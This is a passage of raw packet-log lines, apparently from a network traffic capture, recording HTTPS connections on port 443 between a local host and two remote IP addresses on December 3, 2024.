                                Dec 3, 2024 17:51:12.669701099 CET4434997813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.669764042 CET4434997813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.675168991 CET49978443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.698410988 CET49967443192.168.2.520.109.210.53
                                Dec 3, 2024 17:51:12.698451042 CET4434996720.109.210.53192.168.2.5
                                Dec 3, 2024 17:51:12.698479891 CET49967443192.168.2.520.109.210.53
                                Dec 3, 2024 17:51:12.698489904 CET4434996720.109.210.53192.168.2.5
                                Dec 3, 2024 17:51:12.876126051 CET49976443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.876166105 CET4434997613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.876183033 CET49976443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.876189947 CET4434997613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.878398895 CET49978443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.878405094 CET4434997813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.878415108 CET49978443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.878417969 CET4434997813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.879697084 CET49974443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.879697084 CET49974443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.879725933 CET4434997413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.879738092 CET4434997413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.880645037 CET49977443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.880645037 CET49977443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.880677938 CET4434997713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.880690098 CET4434997713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:13.078128099 CET49983443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:13.078165054 CET4434998313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:13.079488039 CET49984443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:13.079495907 CET4434998413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:13.081295013 CET49985443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:13.081337929 CET4434998513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:13.085169077 CET49986443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:13.085177898 CET4434998613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:13.089241982 CET49983443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:13.089284897 CET49984443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:13.089369059 CET49985443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:13.089435101 CET49986443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:13.089879990 CET49986443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:13.089895964 CET4434998613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:13.090033054 CET49983443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:13.090042114 CET4434998313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:13.090389967 CET49984443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:13.090399981 CET4434998413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:13.094474077 CET49985443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:13.094485044 CET4434998513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:14.247704029 CET4434998113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:14.251184940 CET49981443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:14.251204014 CET4434998113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:14.253259897 CET49981443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:14.253266096 CET4434998113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:14.683676958 CET4434998113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:14.683780909 CET4434998113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:14.684005976 CET49981443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:14.686532021 CET49981443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:14.686532021 CET49981443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:14.686551094 CET4434998113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:14.686562061 CET4434998113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:14.689914942 CET49987443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:14.689944983 CET4434998713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:14.690310001 CET49987443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:14.690579891 CET49987443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:14.690587997 CET4434998713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:14.837502003 CET4434998513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:14.841317892 CET49985443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:14.841331959 CET4434998513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:14.843060970 CET49985443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:14.843065023 CET4434998513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:14.892632961 CET4434998413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:14.894520998 CET49984443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:14.894531012 CET4434998413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:14.895000935 CET49984443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:14.895005941 CET4434998413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:14.895998955 CET4434998613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:14.896797895 CET49986443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:14.896806002 CET4434998613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:14.897221088 CET49986443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:14.897224903 CET4434998613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:14.954976082 CET4434998313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:14.955730915 CET49983443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:14.955744982 CET4434998313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:14.956239939 CET49983443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:14.956244946 CET4434998313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:15.277069092 CET4434998513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:15.277132988 CET4434998513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:15.277221918 CET49985443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:15.278582096 CET49985443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:15.278594017 CET4434998513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:15.278606892 CET49985443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:15.278611898 CET4434998513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:15.282351017 CET49988443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:15.282392025 CET4434998813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:15.282536983 CET49988443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:15.282844067 CET49988443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:15.282859087 CET4434998813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:15.339948893 CET4434998413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:15.340013981 CET4434998413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:15.342031956 CET49984443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:15.342539072 CET49984443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:15.342567921 CET4434998413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:25.130655050 CET50006443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:25.130661964 CET4435000613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:25.185112953 CET50011443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:25.185152054 CET4435001113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:25.188908100 CET50011443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:25.216295004 CET50011443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:25.216311932 CET4435001113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:25.725178003 CET4435000713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:25.810429096 CET50007443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:25.810461998 CET4435000713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:25.810921907 CET50007443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:25.810934067 CET4435000713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:25.991415977 CET4435000813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:26.004363060 CET50008443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:26.004386902 CET4435000813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:26.004854918 CET50008443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:26.004859924 CET4435000813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:26.165287018 CET4435000713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:26.165359974 CET4435000713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:26.177247047 CET50007443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:26.201976061 CET50007443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:26.202001095 CET4435000713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:26.202013016 CET50007443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:26.202018976 CET4435000713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:26.214015007 CET50012443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:26.214031935 CET4435001213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:26.217709064 CET50012443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:26.229155064 CET50012443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:26.229163885 CET4435001213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:26.312798023 CET4435000913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:26.382136106 CET50009443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:26.382167101 CET4435000913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:26.382621050 CET50009443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:26.382630110 CET4435000913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:26.440457106 CET4435000813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:26.440506935 CET4435000813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:26.451328039 CET4435000813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:26.459844112 CET50008443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:26.493145943 CET50008443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:26.493172884 CET4435000813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:26.493185997 CET50008443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:26.493192911 CET4435000813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:26.496633053 CET50013443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:26.496669054 CET4435001313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:26.496916056 CET50013443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:26.497051954 CET50013443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:26.497071028 CET4435001313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:26.757035971 CET4435000913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:26.757093906 CET4435000913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:26.772483110 CET50009443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:26.832209110 CET50009443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:26.832237005 CET4435000913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:26.832282066 CET50009443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:26.832289934 CET4435000913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:26.921366930 CET4435001013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:27.013135910 CET50010443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:27.025990963 CET4435001113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:27.042160988 CET50010443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:27.042179108 CET4435001013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:27.042901993 CET50010443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:27.042906046 CET4435001013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:27.056201935 CET50014443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:27.056266069 CET4435001413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:27.073750019 CET50014443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:27.077843904 CET50011443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:27.077864885 CET4435001113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:27.078346968 CET50011443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:27.078360081 CET4435001113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:27.099103928 CET50014443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:27.099126101 CET4435001413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:27.371503115 CET4435001013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:27.371562958 CET4435001013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:27.376492023 CET50010443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:27.470341921 CET4435001113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:27.470397949 CET4435001113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:27.477365017 CET50011443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:27.487802982 CET50010443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:27.487835884 CET4435001013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:27.487852097 CET50010443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:27.487859011 CET4435001013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:27.529764891 CET50011443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:27.529764891 CET50011443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:27.529795885 CET4435001113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:27.529812098 CET4435001113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:27.714137077 CET50015443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:27.714178085 CET4435001513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:27.714734077 CET50015443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:27.715742111 CET50016443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:27.715779066 CET4435001613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:27.715958118 CET50016443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:27.779386997 CET50015443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:27.779409885 CET4435001513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:27.779850006 CET50016443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:27.779881954 CET4435001613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:28.028012037 CET4435001213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:28.118683100 CET50012443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:28.118706942 CET4435001213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:28.119265079 CET50012443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:28.119271040 CET4435001213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:28.141474009 CET4435001313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:28.204565048 CET50013443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:28.378822088 CET50013443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:28.378842115 CET4435001313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:28.379394054 CET50013443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:28.379404068 CET4435001313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:28.480613947 CET4435001213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:28.480690956 CET4435001213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:28.487524033 CET50012443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:28.672389030 CET50012443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:28.672389030 CET50012443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:28.672416925 CET4435001213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:28.672426939 CET4435001213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:28.697947025 CET50017443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:28.697973967 CET4435001713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:28.705302000 CET50017443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:28.710712910 CET50017443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:28.710725069 CET4435001713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:28.714360952 CET4435001313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:28.714416981 CET4435001313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:28.716331959 CET50013443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:28.716442108 CET50013443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:28.716459990 CET4435001313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:28.716471910 CET50013443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:28.716491938 CET4435001313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:28.729573011 CET50018443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:28.729594946 CET4435001813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:28.733150005 CET50018443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:28.741427898 CET50018443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:28.741446018 CET4435001813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:28.953922033 CET4435001413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:28.957798958 CET50014443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:28.957822084 CET4435001413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:28.958317041 CET50014443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:28.958322048 CET4435001413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:29.593569040 CET4435001413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:29.593636990 CET4435001413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:29.593856096 CET50014443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:29.594322920 CET50014443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:29.594340086 CET4435001413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:29.594352961 CET50014443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:29.594358921 CET4435001413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:29.599569082 CET50019443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:29.599622011 CET4435001913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:29.599704981 CET50019443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:29.599908113 CET50019443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:29.599929094 CET4435001913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:29.708322048 CET4435001613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:29.717504025 CET50016443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:29.717531919 CET4435001613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:29.718012094 CET50016443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:29.718015909 CET4435001613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:29.733685017 CET4435001513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:29.734232903 CET50015443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:29.734252930 CET4435001513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:29.734695911 CET50015443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:29.734702110 CET4435001513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:30.155858040 CET4435001613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:30.155914068 CET4435001613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:30.158936977 CET50016443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:30.160249949 CET50016443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:30.160270929 CET4435001613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:30.160284996 CET50016443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:30.160290956 CET4435001613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:30.197010994 CET4435001513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:30.197087049 CET4435001513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:30.207318068 CET4435001513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:30.207562923 CET50015443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:30.267947912 CET50015443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:30.267976046 CET4435001513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:30.267988920 CET50015443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:30.267996073 CET4435001513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:30.319467068 CET50020443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:30.319494963 CET4435002013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:30.319915056 CET50021443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:30.319967031 CET4435002113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:30.320347071 CET50020443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:30.320352077 CET50021443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:30.320802927 CET50020443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:30.320813894 CET4435002013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:30.320941925 CET50021443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:30.320957899 CET4435002113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:30.649058104 CET4435001713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:30.653831005 CET4435001813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:30.709352970 CET50017443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:30.709372044 CET4435001713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:30.709855080 CET50017443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:30.709858894 CET4435001713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:30.710078001 CET50018443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:30.710088015 CET4435001813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:30.710433960 CET50018443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:30.710438013 CET4435001813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:31.093652964 CET4435001713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:31.093725920 CET4435001713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:31.095750093 CET50017443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:31.099260092 CET4435001813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:31.099350929 CET4435001813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:31.115869045 CET50018443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:31.134983063 CET50017443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:31.134995937 CET4435001713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:31.135009050 CET50017443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:31.135013103 CET4435001713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:31.254241943 CET50018443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:31.254241943 CET50018443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:31.254285097 CET4435001813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:31.254298925 CET4435001813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:31.317389011 CET4435001913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:31.439268112 CET50019443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:31.851402998 CET50019443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:31.851428986 CET4435001913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:31.851893902 CET50019443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:31.851897955 CET4435001913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:31.858807087 CET50022443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:31.858850002 CET4435002213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:31.860312939 CET50023443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:31.860387087 CET4435002313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:31.868406057 CET50022443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:31.868629932 CET50022443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:31.868643999 CET4435002213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:31.868676901 CET50023443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:31.880515099 CET50023443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:31.880532980 CET4435002313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:32.234842062 CET4435001913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:32.234913111 CET4435001913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:32.235472918 CET50019443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:32.235790968 CET50019443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:32.235790968 CET50019443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:32.235804081 CET4435001913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:32.235810995 CET4435001913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:32.241450071 CET50024443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:32.241497993 CET4435002413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:32.244461060 CET50024443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:32.244972944 CET50024443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:32.244985104 CET4435002413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:32.388689041 CET4435002113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:32.389272928 CET50021443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:32.389316082 CET4435002113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:32.389803886 CET50021443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:32.389813900 CET4435002113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:32.560084105 CET4435002013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:32.609822989 CET50020443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:32.609898090 CET4435002013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:32.610312939 CET50020443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:32.610327005 CET4435002013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:32.947742939 CET4435002113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:32.947807074 CET4435002113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:32.955336094 CET4435002113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:32.959779978 CET50021443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:33.052840948 CET50021443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:33.052874088 CET4435002113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:33.052908897 CET50021443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:33.052916050 CET4435002113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:33.067600965 CET50025443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:33.067641020 CET4435002513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:33.067737103 CET50025443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:33.067898035 CET50025443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:33.067913055 CET4435002513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:33.088037968 CET4435002013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:33.088129997 CET4435002013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:33.088387012 CET50020443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:33.088416100 CET50020443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:33.088416100 CET50020443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:33.088429928 CET4435002013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:33.088438034 CET4435002013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:33.091603994 CET50026443192.168.2.513.107.246.63
